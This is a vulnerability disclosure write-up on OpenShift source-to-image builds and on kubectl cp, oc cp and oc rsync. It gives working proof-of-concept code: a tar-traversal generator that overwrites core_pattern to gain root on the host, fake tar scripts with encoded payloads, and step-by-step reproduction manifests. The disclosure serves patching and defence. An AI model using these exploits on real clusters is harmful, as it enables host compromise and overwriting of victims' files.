Author: Michael Hanselmann. Updated: May 4, 2018.
- Gaining root on host through source-to-image build
- Reproduction
- Exploiting path traversal in kubectl cp
- Reproduction
- Exploiting path traversal in oc cp and oc rsync
- Reproduction for oc rsync
OpenShift source-to-image (S2I/STI) builds allow an unprivileged user to build Docker images on an OpenShift cluster. Unlike normal Docker builds these don't require privileged access to a Docker socket and daemon. All user-controlled code is run with reduced privileges.
In OpenShift Container Platform 3.0 up to and including 3.9, the S2I builder contained a vulnerability allowing an attacker to gain root access to the host system, that is, even outside any Docker container. It is tracked as CVE-2018-1102. Red Hat fixed the vulnerability in the following OpenShift errata releases on April 27, 2018:
- OpenShift Container Platform 3.9.25
- OpenShift Container Platform 3.7.44
- OpenShift Container Platform 3.6.173.0.113
- OpenShift Container Platform 3.5.5.31.67
- OpenShift Container Platform 3.1 through 3.4 also received updates
OpenShift Online 3.x and OpenShift Dedicated 3.x were also affected and have been patched by Red Hat.
The underlying cause is comparable to an issue in Kubernetes' kubectl cp command, which I found and reported in March 2018 (Kubernetes issue 61297, Red Hat bug 1564305, reference CVE-2018-1002100). The same code can be found in OpenShift's oc cp command, and OpenShift's oc rsync command was vulnerable too.
Gaining root on host through source-to-image build
The source-to-image builder supports incremental builds. It does so by looking for a script named save-artifacts in the last image built by a build configuration. The archive unpacking code in openshift/source-to-image/pkg/tar/tar.go:ExtractTarStreamFromTarReader passed filenames from tar headers as input to filepath.Join without further sanitization. The same code is used by oc rsync, making it equally exploitable.
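To illustrate why joining an unsanitized tar header name is dangerous, here is a minimal Python sketch. It is not the S2I code: the helper name is hypothetical, posixpath.normpath stands in for the cleaning that Go's filepath.Join performs, and /tmp/artifacts is assumed as the extraction directory (it is the path the PoC's assemble script checks).

```python
import posixpath


def joined_like_filepath_join(dest_dir, header_name):
    """Join a destination directory and a tar header name, then clean the result.

    Hypothetical helper: normpath is used as a stand-in for the path cleaning
    done by Go's filepath.Join. Unlike Go, posixpath.join discards dest_dir
    when header_name is absolute, so only relative names are shown here.
    """
    return posixpath.normpath(posixpath.join(dest_dir, header_name))


# A harmless name stays below the destination directory, while a name
# containing ".." components resolves to a path outside of it.
for name in ("artifactmarker", "../../proc/sys/kernel/core_pattern"):
    print(name, "->", joined_like_filepath_join("/tmp/artifacts", name))
```

Nothing in the join itself rejects the second name; a check that the cleaned result still lies below the destination directory has to be added separately.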
Engineering a build to emit a malicious tar archive from save-artifacts was almost trivial. The main challenge was that the S2I builder makes exactly one call to the execve(2) system call to invoke bsdtar, and that's well before the artifacts are unpacked and can insert or replace executables. No dynamic library is loaded either.
The proof-of-concept exploit therefore relies on the fact that the builder container can overwrite the kernel's core_pattern, described in more detail in core(5). Once that's done the build triggers a core dump and the kernel executes the command previously written to core_pattern in the context of the host system. Here we'll only use an Nginx container, but it'd be trivial to start a custom image in a privileged container with the host filesystem mounted.
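As a rough illustration of the core_pattern format the exploit depends on, the following Python sketch classifies a value the way core(5) describes it: a leading pipe symbol means the rest of the line is a command line, split on white space. The function name and the returned dictionary are hypothetical; the 128-character limit is the one asserted in the PoC script.

```python
CORE_PATTERN_LIMIT = 128  # limit asserted by the PoC script, see core(5)


def describe_core_pattern(pattern):
    """Summarise how a core_pattern value would be interpreted (illustrative only)."""
    pattern = pattern.rstrip("\n")
    is_pipe = pattern.startswith("|")
    return {
        # True when the kernel would run a program instead of writing a core file
        "pipe": is_pipe,
        # Program path and arguments, delimited by white space
        "argv": pattern[1:].split() if is_pipe else [],
        # Whether the value fits into the documented length limit
        "fits": len(pattern) <= CORE_PATTERN_LIMIT,
    }


info = describe_core_pattern("|/bin/docker run -d --name demo -p 8080:80 nginx")
print(info["pipe"], info["argv"][0], info["fits"])
```

On a test machine the current value can be read from /proc/sys/kernel/core_pattern and passed to the same function.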
The original report was reproduced against OpenShift Container Platform v3.6.173.0.96 and v3.7.23.
Reproduction
- Create a new project (depending on the cluster environment this may be done another way, e.g. through a control panel):
master$ oc new-project --skip-config-write poc
- Assuming the client now has access to the newly created project we'll create the necessary objects:
client$ oc -n poc create -f - <<'EOF'
apiVersion: v1
kind: List
items:
- apiVersion: v1
  kind: ImageStream
  metadata:
    name: poc
  spec:
    lookupPolicy:
      local: false
- apiVersion: v1
  kind: BuildConfig
  metadata:
    name: poc
  spec:
    failedBuildsHistoryLimit: 3
    successfulBuildsHistoryLimit: 3
    nodeSelector: {}
    runPolicy: Serial
    source:
      type: Binary
      binary:
        asFile: ""
    strategy:
      type: Source
      sourceStrategy:
        from:
          kind: ImageStreamTag
          namespace: openshift
          name: php:7.0
        incremental: true
        env:
        - name: BUILD_LOGLEVEL
          value: "7"
    output:
      to:
        kind: ImageStreamTag
        name: poc:latest
EOF
- For easier observation it's recommended to pin the builds to a specific host, though this isn't strictly necessary:
client$ oc -n poc patch bc/poc --type=strategic --patch='{ "spec": { "nodeSelector": { "kubernetes.io/hostname": "node.example.com" }}}'
- Assuming the build was pinned to a host, log onto that host and verify that nothing runs on port 8080:
node$ curl --show-error --silent http://localhost:8080 | head -n2
curl: (7) Failed connect to localhost:8080; Connection refused
- We'll need a Python script to generate the build input:
client$ cat >poc.py <<'EOPY'
#!/usr/bin/python3
#
# Copyright (C) 2018, Michael Hanselmann <https://hansmi.ch/>

import os
import shutil
import sys
import tarfile
import tempfile
import base64

# This command runs in the context of the host system, thus we need to use
# a command already available (unless we know the path of a file we can
# control). Docker containers can be made privileged and can mount the host
# filesystem.
CORE_PATTERN = "|/bin/docker run -d --name demo -p 8080:80 nginx"

# "core_pattern" may be at most 128 characters long, see core(5)
assert len(CORE_PATTERN) <= 128

with tempfile.NamedTemporaryFile() as tmpbinarytar, \
     tarfile.TarFile.open(tmpbinarytar.name, "w") as binarytar, \
     tempfile.NamedTemporaryFile() as tmpinnertar, \
     tarfile.TarFile.open(tmpinnertar.name, "w") as innertar:
    # Marker file to detect when a build used "save-artifacts"
    with tempfile.NamedTemporaryFile() as empty:
        empty.write(b"marker")
        empty.flush()
        innertar.add(empty.name, arcname="artifactmarker")

    # Just for fun: redirect write to /proc via symlink; writing directly to
    # "../../../../../proc/sys/..." would also work
    link = tarfile.TarInfo()
    link.name = "proc"
    link.type = tarfile.SYMTYPE
    link.linkname = "../../../../../../../../proc"
    innertar.addfile(link)

    with tempfile.NamedTemporaryFile() as corepattern:
        corepattern.write(CORE_PATTERN.encode("ascii"))
        corepattern.flush()
        innertar.add(corepattern.name, arcname="proc/sys/kernel/core_pattern")

    innertar.close()

    # "save-artifacts" script: emits the inner archive on standard output
    with tempfile.NamedTemporaryFile() as script:
        script.write("""#!/bin/bash
base64 -d <<'EOF'
""".encode("ascii"))
        script.write(base64.b64encode(open(tmpinnertar.name, 'rb').read()))
        script.write(b"""
EOF
""")
        script.flush()
        os.chmod(script.name, 0o755)
        binarytar.add(script.name, arcname=".s2i/bin/save-artifacts")

    # "assemble" script: triggers a core dump once core_pattern is in place
    with tempfile.NamedTemporaryFile() as script:
        script.write("""#!/bin/bash
find /tmp -type f | sort
echo
cat /proc/sys/kernel/core_pattern
echo
if test -e /tmp/artifacts/artifactmarker && [ "$(< /proc/sys/kernel/core_pattern)" == '{0}' ]; then
  # Trigger core pattern
  bash -c 'ulimit -c unlimited; kill -ABRT $$'; echo $?
  sleep 2
fi
exit 0
""".format(CORE_PATTERN).encode("ascii"))
        script.flush()
        os.chmod(script.name, 0o755)
        binarytar.add(script.name, arcname=".s2i/bin/assemble")

    binarytar.close()

    tmpbinarytar.seek(0)
    shutil.copyfileobj(tmpbinarytar, sys.stdout.buffer)
EOPY
- Now we start the first build to put the malicious save-artifacts script in position. The result of this build is pushed to the cluster-internal registry.
client$ python3 poc.py | oc -n poc start-build --follow --wait --from-archive=- poc
- Once finished we go for the kill. This second build will retrieve artifacts from the first build and, by unpacking them, overwrite the kernel's core_pattern. The assemble script will detect that the settings are in place and will trigger a core dump.
client$ python3 poc.py | oc -n poc start-build --follow --wait --from-archive=- poc
- Give the system a few seconds (or more if the image needs to be fetched) and then check on the node again:
node$ curl --show-error --silent http://localhost:8080 | head -n2
<!DOCTYPE html>
<html>
This Nginx server in a container was started by a source-to-image build which isn't supposed to have this kind of access.
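The inner archive generated by poc.py first creates a symlink named proc and then writes a file through it. As a sketch of how such an archive could be inspected before unpacking, the Python code below flags members whose path leaves the extraction root or passes through a symlink defined earlier in the same archive. The function names and the reason strings are hypothetical, and the demo archive only mimics the layout of the PoC with a harmless payload.

```python
import io
import posixpath
import tarfile


def suspicious_members(tar):
    """Return (name, reason) pairs for members that could write outside the root."""
    findings = []
    links = set()  # normalized names of symlinks seen so far in this archive
    for member in tar.getmembers():
        name = posixpath.normpath(member.name)
        parts = name.split("/")
        if name.startswith("/") or parts[0] == "..":
            findings.append((member.name, "path escapes extraction root"))
        elif any("/".join(parts[:i]) in links for i in range(1, len(parts))):
            findings.append((member.name, "written through an earlier symlink"))
        if member.issym():
            links.add(name)
    return findings


def build_demo_archive():
    """Build an in-memory archive shaped like the PoC's inner archive."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("proc")
        link.type = tarfile.SYMTYPE
        link.linkname = "../../../../../../../../proc"
        tar.addfile(link)
        payload = b"|/bin/true"  # harmless placeholder payload
        info = tarfile.TarInfo("proc/sys/kernel/core_pattern")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    buf.seek(0)
    return buf


with tarfile.open(fileobj=build_demo_archive(), mode="r") as tar:
    for name, reason in suspicious_members(tar):
        print(name, "->", reason)
```

The check is deliberately simple: it only considers symlinks contained in the archive itself and says nothing about links that already exist in the destination directory.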
Exploiting path traversal in kubectl cp
The kubectl cp command uses the tar program installed within a container to create an archive. It then proceeds to unpack the archive on the client. When the container is controlled by a malicious party who can get a victim to copy any file from a container, e.g. for debugging, they can overwrite any file that is writable by the victim and whose path can be predicted.
This behaviour can be confirmed in kubectl v1.9.5 as well as Red Hat's OpenShift Origin 3.7.2, a downstream consumer of Kubernetes code. It's a result of the code in kubernetes/pkg/kubectl/cmd/cp.go:untarAll using unsanitized filenames from the tar headers as input to filepath.Join. It's been fixed in Kubernetes 1.9.6 and 1.10 (Kubernetes issue 61297).
The client code doesn't set the file mode, hence the PoC uses a plain text file. If the attacker knows the path of an executable writable by the victim (or the latter runs the client as root), executables can be replaced and code execution on the client is gained. There are also ways to gain code execution from non-executable files, for example by overwriting shell startup files such as ~/.bashrc.
While not demonstrated, it's to be expected that a modified and malicious K8s API server could inject arbitrary files into any program execution request originating from a file copy and wouldn't even need a prepared and explicitly requested container.
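For comparison, a client that unpacks an archive received from an untrusted container could verify every target path before writing. The Python sketch below shows one way to do that; it is not the fix applied in Kubernetes, and the function names are hypothetical. It only writes regular files and skips anything that would resolve outside the destination directory.

```python
import io
import os
import tarfile
import tempfile


def extract_checked(tar, dest_dir):
    """Extract regular files only; return names of members that were skipped."""
    dest_root = os.path.realpath(dest_dir)
    skipped = []
    for member in tar:
        target = os.path.realpath(os.path.join(dest_root, member.name))
        # The target must be strictly below the destination directory
        inside = (target != dest_root and
                  os.path.commonpath([dest_root, target]) == dest_root)
        if not member.isfile() or not inside:
            skipped.append(member.name)
            continue
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with tar.extractfile(member) as src, open(target, "wb") as dst:
            dst.write(src.read())
    return skipped


def demo_archive():
    """In-memory archive with one harmless and one traversing member."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in ("hosts", "../../../../../../../var/tmp/unexpected"):
            data = b"Hello World\n"
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


with tempfile.TemporaryDirectory() as dest:
    with tarfile.open(fileobj=demo_archive(), mode="r") as tar:
        print("skipped:", extract_checked(tar, dest))
    print("extracted:", sorted(os.listdir(dest)))
```

Skipping symlink members entirely is a conservative choice for this sketch; a real client may need to support them and would then have to validate link targets as well.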
Reproduction
- Set up a Kubernetes 1.9.5 cluster within a virtual machine using the instructions in the upstream documentation
- For the sake of simplicity we'll use a busybox container and patch it manually, but obviously the malicious tar program could be part of the image (including a widely used base image) and be more advanced than used for the demonstration.
$ kubectl create -f - <<'EOF'
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: poc
  namespace: default
spec:
  replicas: 1
  selector:
    matchLabels:
      app: poc
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: poc
    spec:
      containers:
      - command:
        - /bin/sh
        - -c
        - while sleep 1000; do :; done
        image: docker.io/library/busybox:latest
        imagePullPolicy: Always
        name: busybox
        volumeMounts:
        - mountPath: /usr/local/sbin
          name: store
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30
      volumes:
      - emptyDir: {}
        name: store
EOF
- Generate a script to simulate a tar program. We're using a Python program to generate the shell script. Write the result into the container and make it executable. An example output follows.
#!/usr/bin/python3

import tarfile
import tempfile
import os
import base64

with tempfile.NamedTemporaryFile() as tmpfile, \
     tarfile.TarFile.gzopen(tmpfile.name, "w") as tar:
    with tempfile.NamedTemporaryFile() as text:
        text.write(b"Hello World\n")
        text.flush()
        tar.add(text.name, arcname="../../../../../../../var/tmp/unexpected")

    tar.close()

    print("#!/bin/sh")
    print("base64 -d <<EOF | gunzip -c")
    print(base64.b64encode(open(tmpfile.name, 'rb').read()).decode("ascii"))
    print("EOF")
Example:
$ kubectl exec -it poc-... /bin/sh
# Run within container
$ cat >/usr/local/sbin/tar <<'EOTAR' && chmod +x /usr/local/sbin/tar
#!/bin/sh
base64 -d <<EOF | gunzip -c
H4sICHzQqVoC/3RtcGF5dmlhajdhAO3PQQrCMBCF4Vl7ipwgmTRNewVv4LrY7KopMRWPb3F
pQReCUPg/HrzFzOZZ6+wm96G4epndck2POZ1rGuUXuupUX63bVvWt+NDEJkT1fSvqu9BHMS
p/sNzqUIyRknP99Pft/j5uJ45pmrI55TKNBwEAAAAAAAAAAAAAAAAA7MYTXHs6TAAoAAA=
EOF
EOTAR
- Verify that the PoC-generated file doesn't exist on the client system.
$ stat /var/tmp/unexpected
stat: cannot stat '/var/tmp/unexpected': No such file or directory
- Now comes the part which would have to be done by the victim: copy a file from the container. The PoC code doesn't care about the source file or directory.
$ kubectl cp poc-...:/etc/hosts /tmp/container-hosts
- A file has been written in /var/tmp on the client system:
$ cat /var/tmp/unexpected
Hello World
Exploiting path traversal in oc cp and oc rsync
The oc rsync command, just like kubectl cp, uses the tar program installed within a container to create an archive. See the section on exploiting kubectl cp for more details. oc cp uses the same underlying code as kubectl cp.
oc rsync uses the same archive unpacking code as the source-to-image builder. The focus was on producing an exploit for the latter, but for demonstration purposes a proof-of-concept exploit for oc rsync was made nonetheless. The vulnerability is a result of the archive unpacking code in openshift/source-to-image/pkg/tar/tar.go:ExtractTarStreamFromTarReader using unsanitized filenames from tar headers as input to filepath.Join.
The original report used the following reproduction environment, though far more versions were vulnerable:
- Cluster: OpenShift v3.6.173.0.96 on up-to-date RHEL 7.4 systems, though the specific version doesn't matter
- Clients:
- oc v3.7.2+282e43f (OpenShift Origin)
- oc v3.6.173.0.96 (OpenShift Container Platform)
Reproduction for oc rsync
This demonstration uses oc rsync. oc cp can be exploited by combining the pod setup here with the instructions from the kubectl cp section.
- Create a new project (depending on the cluster environment this may be done another way, e.g. through a control panel):
$ oc new-project --skip-config-write poc
- Assuming the client now has access to the newly created project we'll create the necessary objects. The container is already pre-configured with a malicious tar program which was generated using the Python script already used for kubectl cp.
$ oc -n poc create -f - <<'EOF'
apiVersion: v1
kind: List
items:
- apiVersion: v1
  kind: ConfigMap
  metadata:
    name: override
  data:
    tar: |
      #!/bin/sh
      base64 -d <<EOF | gunzip -c
      H4sICP8WvloC/3RtcGhwZ3d6dmV4AO3PQQrCMBCF4Vl7ipwgmZjYXMEbuC42u2pKTMXjW1xa0IUg
      FP6PB28xs3nWOrvKva+uXSY3X/NjyueWB/mFLjrVV+u6VX0UH/aHFH0IKYn6LmoSo/IH86311Rip
      pbRPf9/u7+M24pjHsZhTqeOwEwAAAAAAAAAAAAAAAADAZjwBJlLCbQAoAAA=
      EOF
- apiVersion: v1
  kind: DeploymentConfig
  metadata:
    name: rsyncpoc
  spec:
    replicas: 1
    selector:
      deployment-config.name: rsyncpoc
    strategy:
      type: Rolling
    template:
      metadata:
        labels:
          deployment-config.name: rsyncpoc
      spec:
        containers:
        - image: busybox
          imagePullPolicy: Always
          command:
          - /bin/sh
          - -c
          - while sleep 1000; do :; done
          name: default-container
          resources: {}
          terminationMessagePath: /dev/termination-log
          terminationMessagePolicy: File
          volumeMounts:
          - name: override
            readOnly: true
            mountPath: /usr/local/sbin
        dnsPolicy: ClusterFirst
        restartPolicy: Always
        schedulerName: default-scheduler
        securityContext: {}
        terminationGracePeriodSeconds: 30
        volumes:
        - name: override
          configMap:
            defaultMode: 420
            name: override
            items:
            - key: tar
              path: tar
              mode: 0555
    test: false
    triggers:
    - type: ConfigChange
EOF
- Verify that the PoC-generated file doesn't exist on the client system.
$ stat /var/tmp/unexpected
stat: cannot stat '/var/tmp/unexpected': No such file or directory
- This part would have to be done by the victim: copy a file from the container. The PoC code doesn't care about the source file or directory. Get the actual pod name first using oc -n poc get pod.
$ oc -n poc rsync rsyncpoc-...:/foo /tmp/
- A file has been written in /var/tmp on the client system:
$ cat /var/tmp/unexpected
Hello World